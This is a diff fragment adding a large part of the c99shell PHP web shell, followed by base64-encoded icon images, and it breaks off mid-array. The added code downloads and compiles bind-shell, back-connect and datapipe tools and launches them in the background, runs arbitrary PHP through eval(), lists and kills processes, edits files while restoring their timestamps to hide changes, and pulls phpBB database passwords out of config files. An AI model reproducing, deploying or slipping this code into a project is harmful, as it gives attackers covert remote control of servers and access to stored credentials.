+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";}
+   }
+   echo "
    ";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "Result of back connection:
    ";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!
    ";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    ";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "Result of datapipe-running:
    ";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!
    ";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";}
+   }
+   echo "
    ";
+  }
+ }
+ ?>Binding port:
    Port: "> Password: ">  
    
+Back connection:
    HOST: "> Port: ">  
    
+Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    
+Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:
    ";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "";}
+  else {$y = "";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i".$head[$i]."";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "
    ";
+  foreach($tab as $i=>$k)
+  {
+   echo "";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";}
+   echo "";
+  }
+  echo "
    ".$v."
    ";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "Result of execution this PHP-code:
    ";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "
    ";
+   }
+   else {echo $ret."
    ";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "
    ";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "


     Display in text-area 
    ";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";}
+  else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("","info"),
+   array("","html"),
+   array("","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("","exe"),
+   array("SDB","sdb"),
+   array("","img"),
+   array("","ini"),
+   array("","download"),
+   array("","notepad"),
+   array("","edit")
+  );
+  echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    ";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " ".$t[0]."";}
+   elseif ($t[1] == $ft) {echo " ".$t[0]."";}
+   else {echo " ".$t[0]."";}
+   echo " (+) |";
+  }
+  echo "
    ";
+  if ($ft == "info")
+  {
+   echo "Information:";
+   if (!$win)
+   {
+    echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    ";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));}
+    else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000
    ";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i";}
+      $a1 .= "
    ";
+      $a2 .= "
    ";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";}
+    echo "
    ".$a0."".$a1."".$a2."

    ";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "Base64 Encode
    ";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "Base64 Encode + Chunk
    ";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "Base64 Encode + Chunk + Quotes
    ";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "
    ";
+   }
+   if (!empty($encoded))
+   {
+    echo "

    ";
+   }
+   echo "HEXDUMP: [Full] [Preview]
    Base64: 
+    [Encode
+[+chunk
+[+chunk+quotes
+[Decode
+
    ";
+  }
+
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "
    ".htmlspecialchars($r)."
    ";}
+  elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";}
+  elseif ($ft == "phpsess")
+  {
+   echo "
    ";
+   $v = explode("|",$r);
+   echo $v[0]."
    ";
+   var_dump(unserialize($v[1]));
+   echo "
    ";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "Execute file:

    Display in text-area
    ";
+  }
+  elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "phpBB configuration is detected in this file!
    ";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "Connect to DB

    ";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:
    ";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";}
+     echo "
    ";
+    }
+   }
+   echo "
    ";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "
    ";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "
    Size: ";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "".$v."";}
+     echo "   ";
+    }
+    echo "

    ";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "Can't write to file!";}
+    else
+    {
+     echo "Saved!";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "
      
    ";
+  }
+  elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";}
+  else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
